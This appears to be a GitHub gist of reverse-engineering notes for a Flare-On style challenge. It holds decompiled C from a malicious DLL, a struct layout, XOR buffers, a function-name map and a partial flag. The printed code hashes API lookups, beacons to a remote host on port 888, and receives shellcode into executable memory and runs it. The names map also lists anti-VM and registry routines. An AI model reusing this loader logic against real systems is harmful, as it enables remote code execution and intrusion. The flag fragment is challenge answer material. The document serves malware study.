Skip to content

Instantly share code, notes, and snippets.

@hasherezade

hasherezade/beacon.cpp Secret

Last active September 15, 2021 21:26
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save hasherezade/ce4a622b52012f766c30f4779cce1bd9 to your computer and use it in GitHub Desktop.
Save hasherezade/ce4a622b52012f766c30f4779cce1bd9 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
beacon.cpp
__int64 __fastcall beacon_to_receive_shellcode(__int64 socket1)
{
__int64 (__fastcall *lstrlenA)(char *); // rax
__int64 len1; // rax
__int64 _len1; // rdi
unsigned int (__fastcall *send)(__int64, char *, __int64, _QWORD, __int64, __int64); // rax
void (__fastcall *closesocket)(__int64); // rax
_BYTE *shellc_buf; // rax
_BYTE *_shellc_buf; // rdx
__int64 next_chunk; // rcx
__int64 (__fastcall *recv)(__int64, char *, __int64, _QWORD); // rax
__int64 size_received; // rax
int index; // ebx
__int64 (__fastcall *VirtualAlloc)(_QWORD, __int64, __int64, __int64); // rax
__int64 v14; // [rsp+20h] [rbp-228h] BYREF
__int64 v15; // [rsp+28h] [rbp-220h] BYREF
char received_buf[512]; // [rsp+30h] [rbp-218h] BYREF
LOBYTE(v14) = 0;
HIDWORD(v14) = 35;
lstrlenA = (__int64 (__fastcall *)(char *))load_func_by_hash(0i64, 1u, 0x2D40B8E6u);
len1 = lstrlenA((char *)&v14 + 4);
LOBYTE(v15) = 0;
_len1 = len1;
HIDWORD(v15) = 35;
send = (unsigned int (__fastcall *)(__int64, char *, __int64, _QWORD, __int64, __int64))load_func_by_hash(
0i64,
4u,
0xE797764u);
if ( send(socket1, (char *)&v15 + 4, _len1, 0i64, v14, v15) == -1 )
{
closesocket = (void (__fastcall *)(__int64))load_func_by_hash(0i64, 4u, 0x939D7D9C);
closesocket(socket1);
shellc_buf = (_BYTE *)load_func_by_hash(0i64, 4u, 0x8FB8B5BD);// WSACleanup
}
else
{
recv = (__int64 (__fastcall *)(__int64, char *, __int64, _QWORD))load_func_by_hash(0i64, 4u, 0xE5971F6u);
size_received = recv(socket1, received_buf, 512i64, 0i64);
index = size_received;
if ( (int)size_received <= 0 )
return size_received;
VirtualAlloc = (__int64 (__fastcall *)(_QWORD, __int64, __int64, __int64))load_func_by_hash(0i64, 1u, 0x697A6AFEu);
shellc_buf = (_BYTE *)VirtualAlloc(0i64, 512i64, 0x3000i64, 64i64);
if ( shellc_buf )
{
_shellc_buf = shellc_buf;
do
{
next_chunk = (unsigned __int8)_shellc_buf[received_buf - shellc_buf];
*_shellc_buf++ = next_chunk;
--index;
}
while ( index );
}
}
return ((__int64 (__fastcall *)(__int64, _BYTE *))shellc_buf)();
}
Raw
communicate_over_socket.cpp
char __fastcall communicate_over_socket(my_struct *struct1)
{
__int64 (__fastcall *socket)(__int64, __int64, __int64); // rax
SOCKET socket1; // rsi
char result; // al
unsigned __int64 v5; // rdi
unsigned __int64 i; // rcx
__int64 (__fastcall *gethostbyname)(char *); // rax
hostent *host_val; // rax
void (__fastcall *closesocket)(SOCKET); // rax
__int64 (__fastcall *htons)(__int64); // rax
unsigned int (__fastcall *connect)(SOCKET, sockaddr_in *, __int64); // rax
__int64 (__fastcall *lstrlenA)(char *); // rax
__int64 v13; // rax
__int64 v14; // rbx
unsigned int (__fastcall *send)(SOCKET, char *, __int64, _QWORD, _QWORD, __int64); // rax
BYTE *curr_indx; // rbx
int v17; // eax
BYTE *buf_rec; // rcx
BYTE buf_bound; // dl
BYTE *v20; // rcx
unsigned __int8 v21; // dl
signed __int64 v22; // r8
__int64 v23; // rdx
BYTE v24; // cl
char v25[8]; // [rsp+20h] [rbp-69h] BYREF
__int64 v26; // [rsp+28h] [rbp-61h] BYREF
char v27; // [rsp+30h] [rbp-59h]
int extension; // [rsp+34h] [rbp-55h] BYREF
char v29; // [rsp+38h] [rbp-51h]
char v30[8]; // [rsp+3Ch] [rbp-4Dh] BYREF
int formatstr_s_s[3]; // [rsp+44h] [rbp-45h] BYREF
char v32; // [rsp+50h] [rbp-39h]
int v33[5]; // [rsp+54h] [rbp-35h] BYREF
sockaddr_in sock_addr1; // [rsp+68h] [rbp-21h] BYREF
char full_host[64]; // [rsp+80h] [rbp-9h] BYREF
socket = (__int64 (__fastcall *)(__int64, __int64, __int64))load_func_by_hash(0i64, 4u, 0xFC7AF16A);
socket1 = socket(2i64, 1i64, 6i64);
if ( socket1 == -1i64 )
return 0;
sock_addr1.sin_family = 2;
v30[4] = 0;
formatstr_s_s[0] = 0x38B2F282;
formatstr_s_s[1] = 0x1D9C81D4;
v5 = 0i64;
for ( i = 0i64; i < 2; ++i )
formatstr_s_s[i] ^= 0x1D9C81A7u; // "%s.%s"
to_wvsprintfA(full_host, formatstr_s_s, struct1->formatStr, struct1->hostAddr);
gethostbyname = (__int64 (__fastcall *)(char *))load_func_by_hash(0i64, 4u, 0xF44318C6);
host_val = (hostent *)gethostbyname(full_host);
if ( !host_val )
goto LABEL_6;
memmove(&sock_addr1.sin_addr, *(const void **)host_val->h_addr_list, host_val->h_length);
htons = (__int64 (__fastcall *)(__int64))load_func_by_hash(0i64, 4u, 0x8E9BF775);
sock_addr1.sin_port = htons(888i64); // port = 888
connect = (unsigned int (__fastcall *)(SOCKET, sockaddr_in *, __int64))load_func_by_hash(0i64, 4u, 0xEDD8FE8A);
if ( connect(socket1, &sock_addr1, 16i64) == -1 )
goto LABEL_6;
v25[0] = 0;
*(_DWORD *)&v25['\x04'] = '@';
lstrlenA = (__int64 (__fastcall *)(char *))load_func_by_hash(0i64, 1u, 0x2D40B8E6u);
v13 = lstrlenA(&v25[4]);
LOBYTE(v26) = 0;
v14 = v13;
HIDWORD(v26) = '@';
send = (unsigned int (__fastcall *)(SOCKET, char *, __int64, _QWORD, _QWORD, __int64))load_func_by_hash(
0i64,
4u,
0xE797764u);
if ( send(socket1, (char *)&v26 + 4, v14, 0i64, *(_QWORD *)v25, v26) == -1 )
{
LABEL_6:
closesocket = (void (__fastcall *)(SOCKET))load_func_by_hash(0i64, 4u, 0x939D7D9C);
closesocket(socket1);
}
else
{
curr_indx = struct1->bufReceived;
v17 = to_recv(socket1, (__int64)struct1->bufReceived, 32u);
if ( v17 <= 0 )
{
if ( !v17 )
{
result = 1;
struct1->mySocket = socket1;
return result;
}
}
else
{
v27 = 0;
strcpy((char *)&extension, "exe"); // "exe"
if ( struct1 != (my_struct *)-448i64 )
{
buf_rec = struct1->bufReceived;
while ( 1 )
{
buf_bound = buf_rec[(char *)&extension - (char *)curr_indx];
if ( *buf_rec < buf_bound || *buf_rec > buf_bound )
break;
if ( (unsigned __int64)(++buf_rec - curr_indx) >= 3 )
{
beacon_to_receive_shellcode(socket1);
return 0;
}
}
}
v29 = 0;
strcpy(v30, "run"); // "run"
if ( struct1 != (my_struct *)-448i64 )
{
v20 = struct1->bufReceived;
while ( 1 )
{
v21 = v20[v30 - (char *)curr_indx];
if ( *v20 < v21 || *v20 > v21 )
break;
if ( (unsigned __int64)(++v20 - curr_indx) >= 3 )
{
to_recv_0(socket1);
return 0;
}
}
}
v32 = 0;
v33[0] = 0x6E5AC0F;
v33[1] = 0x1AEBED0C;
v33[2] = 0x19EBA347;
v33[3] = 0x7484C069;
do
v33[v5++] ^= 0x7484C069u; // "flare.com"
while ( v5 < 4 );
if ( struct1 != (my_struct *)-448i64 )
{
v22 = (char *)v33 - (char *)curr_indx;
v23 = -(__int64)curr_indx;
while ( 1 )
{
v24 = curr_indx[v22];
if ( *curr_indx < v24 || *curr_indx > v24 )
break;
++curr_indx;
if ( (unsigned __int64)&curr_indx[v23] >= 0xC )
{
result = 1;
struct1->mySocket = socket1;
return result;
}
}
}
}
}
return 0;
}
Raw
decode_and_set_keys.cpp
__int64 __fastcall decode_and_set_keys(my_struct *struct_1)
{
__int8 v2; // r8
unsigned int index; // edx
__int8 v4; // r9
__int8 v5; // r10
__int8 v6; // r11
__int8 v7; // di
__int8 v8; // si
__int8 v9; // r14
__int8 v10; // r15
__int8 v11; // r12
__int8 v12; // r13
__int64 (__fastcall *lstrlenA)(__m128i *); // rax
int reg_len; // eax
int v16; // [rsp+24h] [rbp-2Ch] BYREF
__m128i reg_key1; // [rsp+28h] [rbp-28h] BYREF
__m128i reg_key0; // [rsp+38h] [rbp-18h]
reg_key0 = _mm_load_si128(&g_xorData1);
v2 = reg_key0.m128i_i8[6];
index = 0;
v4 = reg_key0.m128i_i8[5];
v5 = reg_key0.m128i_i8[4];
v6 = reg_key0.m128i_i8[3];
v7 = reg_key0.m128i_i8[2];
v8 = reg_key0.m128i_i8[1];
v9 = reg_key0.m128i_i8[0];
reg_key1 = _mm_load_si128(&g_xorData2);
v10 = reg_key1.m128i_i8[15];
v11 = reg_key1.m128i_i8[14];
v12 = reg_key1.m128i_i8[13];
do
{
switch ( index )
{
case 0u:
reg_key1.m128i_i8[0] ^= struct_1->decryptedStr[20];
break;
case 1u:
reg_key1.m128i_i8[1] ^= struct_1->decryptedStr[21];
break;
case 2u:
reg_key1.m128i_i8[2] ^= struct_1->decryptedStr[14];
break;
case 3u:
reg_key1.m128i_i8[3] ^= struct_1->decryptedStr[16];
break;
case 4u:
reg_key1.m128i_i8[4] ^= struct_1->decryptedStr[15];
break;
case 5u:
reg_key1.m128i_i8[5] ^= struct_1->decryptedStr[14];
break;
case 6u:
reg_key1.m128i_i8[6] ^= struct_1->decryptedStr[13];
break;
case 7u:
reg_key1.m128i_i8[7] ^= struct_1->decryptedStr[9];
break;
case 8u:
reg_key1.m128i_i8[8] ^= struct_1->decryptedStr[8];
break;
case 9u:
reg_key1.m128i_i8[9] ^= struct_1->decryptedStr[11];
break;
case 0xAu:
reg_key1.m128i_i8[10] ^= struct_1->decryptedStr[12];
break;
case 0xBu:
reg_key1.m128i_i8[11] ^= struct_1->decryptedStr[25];
break;
case 0xCu:
reg_key1.m128i_i8[12] ^= struct_1->decryptedStr[23];
break;
case 0xDu:
v12 ^= struct_1->decryptedStr[28];
break;
case 0xEu:
v11 ^= struct_1->decryptedStr[27];
break;
case 0xFu:
v10 ^= struct_1->decryptedStr[29];
break;
case 0x10u:
v9 ^= struct_1->decryptedStr[10];
break;
case 0x11u:
v8 ^= struct_1->decryptedStr[18];
break;
case 0x12u:
v7 ^= struct_1->decryptedStr[24];
break;
case 0x13u:
v6 ^= struct_1->decryptedStr[19];
break;
case 0x14u:
v5 ^= struct_1->decryptedStr[22];
break;
case 0x15u:
v4 ^= struct_1->decryptedStr[10];
break;
case 0x16u:
v2 ^= '@';
break;
default:
break;
}
++index;
}
while ( index < 32 );
reg_key0.m128i_i8[6] = v2;
reg_key0.m128i_i8[5] = v4;
reg_key0.m128i_i8[4] = v5;
reg_key0.m128i_i8[3] = v6;
reg_key0.m128i_i8[2] = v7;
reg_key0.m128i_i8[1] = v8;
reg_key0.m128i_i8[0] = v9;
reg_key1.m128i_i8[15] = v10;
reg_key1.m128i_i8[14] = v11;
reg_key1.m128i_i8[13] = v12;
v16 = 48;
lstrlenA = (__int64 (__fastcall *)(__m128i *))load_func_by_hash(0i64, 1u, 0x2D40B8E6u);
reg_len = lstrlenA(&reg_key1);
set_registry_key(struct_1, (__int64)&reg_key1, reg_len + 1, (__int64)&v16);
return 0i64;
}
Raw
flag_part.txt
l3rlcps_7r_vb33eehskc3
Raw
names4.tag
1000;DllMain
1010;Start
1020;check_dll
1120;func_load_checks
1210;fetch_new_dll_names
12c0;load_func_by_hash
1370;to_load_func_by_hash
1380;initialize_dll_names
18e0;sub_1800018E0
1990;_Start
1a40;to_png_and_socket
1e60;init_inactive_strings
1f80;to_communicate_over_socket
2070;communicate_over_socket
2410;beacon_to_receive_shellcode
2590;on_command_run
2730;decode_and_set_keys
2a20;set_registry_key
2ce0;to_recv
2d30;to_wvsprintfA
2d80;get_system_date_format
2e60;to_name_check
2f70;maybe_aes_stuff
33e0;__security_check_cookie
3404;dllmain_crt_dispatch
3454;dllmain_crt_process_attach
3580;dllmain_crt_process_detach
3604;dllmain_dispatch
36fc;dllmain_raw
3750;section:_[.text]
3790;__raise_securityfailure
37c4;__report_gsfailure
3898;__report_rangecheckfailure
38ac;__report_securityfailure
3948;capture_current_context
39b8;capture_previous_context
3a2c;__scrt_acquire_startup_lock
3a68;__scrt_dllmain_after_initialize_c
3a9c;__scrt_dllmain_before_initialize_c
3ab4;anti_vm
3adc;__scrt_dllmain_crt_thread_detach
3af4;__scrt_dllmain_exception_filter
3b58;__scrt_dllmain_uninitialize_c
3b88;__scrt_dllmain_uninitialize_critical
3b9c;__scrt_initialize_crt
3be8;__scrt_initialize_onexit_tables
3cb4;__scrt_is_nonwritable_in_current_image
3d50;__scrt_release_startup_lock
3d74;__scrt_uninitialize_crt
3da0;_onexit
3df0;atexit
3e08;__security_init_cookie
3eb4;_InitializeSListHead
3ec4;sub_180003EC4
3ed0;sub_180003ED0
3ed8;sub_180003ED8
3ee0;__scrt_initialize_default_local_stdio_options
3efc;sub_180003EFC
3f04;sub_180003F04
3f0c;__scrt_fastfail
4054;_RTC_Initialize_0
40a0;_RTC_Initialize_0_0
40ec;j__guard_check_icall_nop
40f4;__isa_available_init
42bc;__uncaught_exception
42d0;strrchr
4410;__C_specific_handler
460c;__vcrt_initialize
4640;Concurrency::details::ScheduleGroupSegmentBase::HasUnrealizedChores
4654;__vcrt_thread_detach
4668;__vcrt_uninitialize
4688;__vcrt_uninitialize_critical
4698;__std_type_info_destroy_list
46e0;memset
4890;_local_unwind
48c0;_NLG_Notify
48f0;__NLG_Return2
48f4;_guard_check_icall_nop
48f8;__vcrt_freefls
4918;__vcrt_freeptd
4968;__vcrt_getptd_noexit
4a20;__vcrt_initialize_ptd
4a60;__vcrt_uninitialize_ptd
4a84;__vcrt_initialize_locks
4acc;__vcrt_uninitialize_locks
4b04;try_get_function
4ccc;__vcrt_FlsAlloc
4d20;__vcrt_FlsFree
4d74;__vcrt_FlsGetValue
4dc8;__vcrt_FlsSetValue
4e30;__vcrt_InitializeCriticalSectionEx
4ea8;__vcrt_initialize_winapi_thunks
4ef4;__vcrt_uninitialize_winapi_thunks
4f34;__vcrt_initialize_pure_virtual_call_handler
4f58;__crt_strtox::is_overflow_condition_ulong_
4f84;unknown_libname_10
4f98;__crt_strtox::parse_integer_ulong
52ac;_LocaleUpdate::_LocaleUpdate
533c;_wtol
5368;j__malloc_base
5370;strnlen
54cc;strncpy_s
55a0;_initterm
5618;_initterm_e
5664;_seh_filter_dll
5678;_seh_filter_exe
5808;dyntls_init_exception_filter
5814;common_exit
5980;exit_or_terminate_process
59cc;try_cor_exit_process
5a38;sub_180005A38
5a40;_cexit
5a50;_exit
5a5c;sub_180005A5C
5a64;parse_command_line_char_
5c20;__acrt_allocate_buffer_for_argv
5c84;_configure_narrow_argv
5dfc;common_initialize_environment_nolock_char_
5e68;create_environment_char_
5f64;unknown_libname_11
5fa8;sub_180005FA8
5fc4;sub_180005FC4
5fe0;__dcrt_uninitialize_environments_nolock
6018;common_initialize_environment_nolock<char>
6020;__crt_seh_guarded_call_int_::operator
605c;__crt_seh_guarded_call<int>::operator
61fc;_lambda_4e60a939b0d047cfe11ddc22648dfba9_::operator
63d8;sub_1800063D8
63e8;_execute_onexit_table
6424;_initialize_onexit_table
6464;_register_onexit_function
64ac;initialize_global_variables
64c0;initialize_c
64e4;__vcrt_uninitialize_critical_0
64f4;initialize_pointers
6548;sub_180006548
6550;uninitialize_allocated_memory
65e0;sub_1800065E0
65e4;__acrt_initialize
65f8;Concurrency::details::ScheduleGroupSegmentBase::HasUnrealizedChores
660c;__vcrt_uninitialize_critical_1
661c;__acrt_uninitialize
6630;__vcrt_uninitialize_critical_2
6640;terminate
6668;_free_base
66a8;_malloc_base
6708;strcpy_s
6768;abort
67c0;_calloc_base
6838;__acrt_call_reportfault
6994;sub_180006994
699c;_invalid_parameter
6a44;_invalid_parameter_noinfo
6a64;_invoke_watson
6aac;__acrt_errno_from_os_error
6af4;__acrt_errno_map_os_error
6b44;__doserrno
6b64;_errno
6b84;__pctype_func
6bb4;_isctype_l
6cc4;__crt_seh_guarded_call_void_::operator
6d24;__crt_seh_guarded_call<void>::operator
6d6c;__crt_seh_guarded_call<void>::operator
6dac;__crt_seh_guarded_call<void>::operator
6dec;construct_ptd_array
6ebc;Concurrency::details::SchedulerProxy::DeleteThis
6edc;destroy_ptd_array
6fd4;replace_current_thread_locale_nolock
703c;__acrt_freeptd
7080;__acrt_getptd
7114;__acrt_getptd_noexit
71b4;__acrt_initialize_ptd
71f0;__vcrt_uninitialize_ptd_0
7214;__acrt_update_locale_info
7248;__acrt_update_locale_info_0
727c;__acrt_set_locale_changed
7288;__acrt_uninitialize_locale
72d0;__vcrt_initialize_locks_0
7318;sub_180007318
7334;__vcrt_uninitialize_locks_0
736c;sub_18000736C
7388;try_get_function
7528;__acrt_FlsAlloc
7580;__acrt_FlsFree
75d8;__vcrt_FlsFree_0
7630;__acrt_FlsSetValue
7698;__acrt_InitializeCriticalSectionEx
7710;__acrt_LCMapStringEx
7800;__acrt_LocaleNameToLCID
7868;__acrt_initialize_winapi_thunks
78a0;__acrt_is_packaged_app
7928;__acrt_uninitialize_winapi_thunks
796c;unknown_libname_12
7980;common_expand_argv_wildcards_char_
7b8c;copy_and_add_argument_to_buffer_char_
7c9c;expand_argument_wildcards_char_
7e48;unknown_libname_13
7f10;common_expand_argv_wildcards<char>
7f18;__crt_seh_guarded_call<void>::operator
7f50;_lambda_ad1ced32f4ac17aa236e5ef05d6b3b7c_::operator
8168;getSystemCP
81e8;setSBCS
8278;setSBUpLow
845c;setmbcp_internal
8614;__acrt_initialize_multibyte
863c;__acrt_update_thread_multibyte_data
86fc;_setmbcp_nolock
89a4;x_ismbbtype_l
8a1c;_ismbblead
8a30;__acrt_initialize_command_line
8a58;__dcrt_get_narrow_environment_from_os
8b5c;j__recalloc_base
8b64;_recalloc_base
8bfc;__acrt_initialize_heap
8c18;sub_180008C18
8c24;initialize_inherited_file_handles_nolock
8d10;initialize_stdio_handles_nolock
8e0c;__acrt_initialize_lowio
8e48;__acrt_uninitialize_lowio
8e88;__acrt_execute_initializers
8f1c;__acrt_execute_uninitializers
8f6c;sub_180008F6C
8f74;_callnewh
8fb4;_query_new_handler
8fe8;__crt_seh_guarded_call_void
9030;__acrt_get_sigabrt_handler
9060;_initp_misc_winsig
9080;raise
931c;__acrt_has_user_matherr
933c;sub_18000933C
9344;__acrt_invoke_user_matherr
938c;sub_18000938C
9394;_mbtowc_l
94dc;mbtowc
94e4;_fileno
950c;__acrt_initialize_stdio
962c;__acrt_uninitialize_stdio
9688;sub_180009688
9694;sub_180009694
96a0;_isleadbyte_l
96e0;__acrt_GetStringTypeA
9894;__acrt_add_locale_ref
9920;__acrt_free_locale
9ac0;__acrt_locale_free_lc_time_if_unreferenced
9af8;__acrt_locale_release_lc_time_reference
9b20;__acrt_release_locale_ref
9bc8;__acrt_update_thread_locale_data
9c38;_updatetlocinfoEx_nolock
9ca0;__free_lconv_mon
9dac;__free_lconv_num
9e18;free_crt_array_internal
9e70;__acrt_locale_free_time
9f78;GetTableIndexFromLocaleName
a040;__crtDownlevelLocaleNameToLCID
a080;shortsort
a150;qsort
a484;unknown_libname_14
a524;_mbsdec
a52c;_mbsdec_l
a5c4;initialize_multibyte
a5dc;__acrt_LCMapStringA_stat
a938;__acrt_LCMapStringA
a9d0;_msize
aa0c;_realloc_base
aa90;__acrt_lowio_create_handle_array
ab28;__acrt_lowio_destroy_handle_array
ab78;__acrt_lowio_ensure_fh_exists
ac30;__acrt_lowio_unlock_fh_0
ac54;__acrt_lowio_unlock_fh_0_0
ac78;_free_osfhnd
ad34;_get_osfhandle
adac;_isatty
ae0c;__acrt_stdio_flush_nolock
ae84;_fflush_nolock
aed0;_flushall
aedc;common_flush_all
afc0;_fcloseall
b074;__acrt_stdio_free_buffer_nolock
b0b4;__strncnt
b0cc;sub_18000B0CC
b0d4;__crt_seh_guarded_call<int>::operator
b160;_commit
b1f4;write_double_translated_ansi_nolock
b3fc;write_text_ansi_nolock
b504;write_text_utf16le_nolock
b620;write_text_utf8_nolock
b794;_write
b880;_write_nolock
bb70;log10
c11c;common_lseek_nolock___int64_
c1b8;common_lseek_nolock<__int64>
c1c0;_fclose_nolock
c244;ftell
c2b0;_putwch_nolock
c30c;_call_matherr
c374;_exception_enabled
c430;_handle_error
c560;__acrt_initialize_fma3
c5d0;_log10_special
c5f0;_log_special_common
c688;__crt_seh_guarded_call<int>::operator
c6fc;_close
c7a0;_close_nolock
c85c;__acrt_stdio_free_stream
c8a0;__dcrt_lowio_initialize_console_output
c8dc;__dcrt_terminate_console_output
c910;_get_fpsr
c920;_set_fpsr
c92a;_fclrf
c95c;_return
c960;_raise_exc
c988;_raise_exc_ex
cc90;_set_errno_from_matherr
ccc0;_clrfp
cce0;_ctrlfp
cd5c;_set_statfp
cd7c;_statfp
cd8e;IsProcessorFeaturePresent
cd94;RtlUnwindEx
cda0;_FindPESection
cdf0;_IsNonwritableInCurrentImage
ce40;_ValidateImageBase
ce70;__GSHandlerCheck
ce90;__GSHandlerCheckCommon
cf00;_alloca_probe
cf70;memmove
d3c0;memcmp
d4a0;_guard_dispatch_icall_nop
Raw
task7_notes.txt
structure:
struct _my_struct
{
char currentDateStr[12];
BYTE someData[11];
QWORD resourceBin;
DWORD resourceSize;
DWORD roundId;
char processName[261];
char formatStr[34];
BOOL isWow64;
DWORD connAttempts;
DWORD unknown0;
QWORD padding1[4];
DWORD wow64Flag;
char *hostAddr;
DWORD timeout;
DWORD unk;
SOCKET mySocket;
BYTE decryptedStr[32];
BYTE bufReceived[32];
};
Raw
xor_bufs.txt
C3 C1 A8 06 C2 96 33 00 00 00 00 00 00 00 00 00 8A 1D 89 15 14 9F C1 1D 99 7E 8A 1B 00 00 00 00
E2 A4 B7 A7 D7 AC 87 8D 9B 9C 85 0D D8 8E E5 FA
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment